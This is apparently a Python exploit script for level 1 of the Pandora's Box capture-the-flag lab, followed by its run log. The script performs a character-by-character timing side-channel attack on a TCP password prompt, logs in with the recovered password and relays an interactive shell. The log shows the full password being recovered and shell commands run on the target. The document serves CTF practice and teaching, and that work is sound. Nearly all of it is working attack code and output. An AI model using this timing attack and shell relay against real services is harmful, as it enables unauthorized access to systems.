pandora_l1.py
#!/usr/bin/python
# Pandoras Box
# Level 1
import time
import socket
import string
import sys
def find_next_char(sock, current_string):
    """ Take a current string, and perform a timing attack
    on the Pandoras Box Level one (tcp/54311 service)

    Args:
        sock: connected socket to the service. Each candidate string is
            written with send() and up to 50 bytes of the reply are read
            and discarded; only the elapsed time is used.
        current_string: the prefix recovered so far.

    Returns:
        The single character (from a-z, A-Z, 0-9) whose candidate
        ``current_string + char`` had the lowest mean round-trip time over
        5 samples. Only the ordering of the averages matters; no absolute
        threshold is applied.

    The measurement only distinguishes characters if the remote
    comparison's response time depends on the input; a service that
    compares in constant time, or adds delay/jitter to its replies,
    makes the averages indistinguishable and the returned character
    effectively arbitrary.
    """
    # prepare the string of characters
    # that we will be looping over
    input_seq = string.lowercase
    input_seq += string.uppercase
    input_seq += string.digits
    # set some default values for next
    # few socket requests
    fastest_time = sys.maxint
    fastest_char = None
    # start a loop over the characters
    # in input_seq
    for character_seq in input_seq:
        # add the character to the current string
        character = current_string + character_seq
        # each character will have their response
        # time averaged. This average will become
        # the one we use
        character_time = 0
        for i in range(5):
            # The timed window covers send() and the first recv() only;
            # reply contents are not inspected.
            # NOTE(review): send()'s return value is unchecked, so a
            # partial write would time a truncated candidate.
            start_time = time.time()
            sock.send(character)
            result = sock.recv(50)
            elapsed_time = time.time() - start_time
            # add the time elapsed for use in the
            # average calculation
            character_time += elapsed_time
        # with 5 samples, we % by 5. That will be
        # the time sample
        character_time = character_time/5
        #print 'Character %s has time of %s' % (character, character_time)
        # if the time for the character is less than
        # the current known fastest one, we will
        # use that
        if character_time < fastest_time:
            fastest_time = character_time
            fastest_char = character_seq
    # after all of the characters, add the fastest
    # to the current string
    #print 'The fastest character was %s responding in %s' % (fastest_char, fastest_time)
    # return the character
    return fastest_char
def do_login(sock, password):
    """Submit *password* over *sock* and report whether the service accepted it.

    Args:
        sock: connected socket; the candidate is written with send() and
            up to 250 bytes of reply are read back.
        password: candidate password string.

    Returns:
        True when the reply does not contain the substring 'Invalid'
        (a success line is printed first), False otherwise.
    """
    print('Attempting login with: %s (%s)' % (password, len(password)))
    sock.send(password)
    reply = sock.recv(250)
    # The service marks a rejected password with the word 'Invalid';
    # any other reply is treated as a successful login.
    rejected = 'Invalid' in reply
    if rejected:
        return False
    print('Login success with password: %s' % password)
    return True
def do_shell(sock):
    """Relay commands typed by the user to *sock* until the peer stops answering.

    Each round prints whatever is pending on the socket (up to 2048 bytes),
    prompts with '(py-shell) $ ', sends the command followed by a newline,
    and prints the stripped reply. An empty reply, ^C or ^D closes the
    socket and returns.
    """
    try:
        while True:
            # Show what the peer already sent (prompt, leftover output).
            print(sock.recv(2048))
            command = raw_input("(py-shell) $ ")
            sock.send(command + "\n")
            reply = sock.recv(2048).strip()
            if reply:
                print(reply)
                continue
            # A zero-length reply is taken to mean the remote side is gone.
            print("[+] Empty response. Dead shell / exited?")
            sock.close()
            break
    except KeyboardInterrupt:
        print("\n[+] ^C Received, closing connection")
        sock.close()
    except EOFError:
        print("\n[+] ^D Received, closing connection")
        sock.close()
if __name__ == '__main__':
    # A single TCP connection is reused for the whole run: banner, every
    # timing probe, each login attempt and the final shell all go over it.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('192.168.217.129', 54311))
    # grab the banner and welcome
    banner = sock.recv(250)
    welcome = sock.recv(250)
    password = ''
    while True:
        # Grow the candidate one character at a time and try a login after
        # each extension; the loop only ends on a successful login.
        password = password + find_next_char(sock, password)
        # if we can login, start interaction with the shell
        if do_login(sock, password):
            do_shell(sock)
            break
root@007:~/pb0x# python pandora.py
Attempting login with: R (1)
Attempting login with: R3 (2)
Attempting login with: R3s (3)
Attempting login with: R3sp (4)
Attempting login with: R3sp3 (5)
Attempting login with: R3sp3c (6)
Attempting login with: R3sp3ct (7)
Attempting login with: R3sp3ctY (8)
Attempting login with: R3sp3ctY0 (9)
Attempting login with: R3sp3ctY04 (10)
Attempting login with: R3sp3ctY04r (11)
Attempting login with: R3sp3ctY04r4 (12)
Attempting login with: R3sp3ctY04r4d (13)
Attempting login with: R3sp3ctY04r4dm (14)
Attempting login with: R3sp3ctY04r4dm1 (15)
Attempting login with: R3sp3ctY04r4dm1n (16)
Attempting login with: R3sp3ctY04r4dm1ni (17)
Attempting login with: R3sp3ctY04r4dm1niS (18)
Attempting login with: R3sp3ctY04r4dm1niSt (19)
Attempting login with: R3sp3ctY04r4dm1niSt4 (20)
Attempting login with: R3sp3ctY04r4dm1niSt4t (21)
Attempting login with: R3sp3ctY04r4dm1niSt4t0 (22)
Attempting login with: R3sp3ctY04r4dm1niSt4t0r (23)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL (24)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1 (25)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1k (26)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1ke (27)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keY (28)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo (29)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4 (30)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R (31)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3 (32)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3s (33)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3sp (34)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spe (35)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spec (36)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spect (37)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY (38)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY0 (39)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04 (40)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04r (41)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG (42)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0 (43)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0q (44)
Login success with password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0q
Shell$
(py-shell) $ ls
level2
level2_readme.txt
Shell$
(py-shell) $ id
uid=1001(level1) gid=1001(level1) groups=1001(level1)
Shell$
(py-shell) $